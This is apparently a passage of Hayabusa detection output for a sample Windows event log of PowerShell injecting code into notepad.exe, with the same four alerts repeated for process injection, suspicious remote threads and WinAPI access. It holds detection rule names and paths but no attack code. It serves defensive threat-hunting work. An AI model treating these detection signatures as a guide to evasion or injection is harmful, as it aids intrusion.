Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
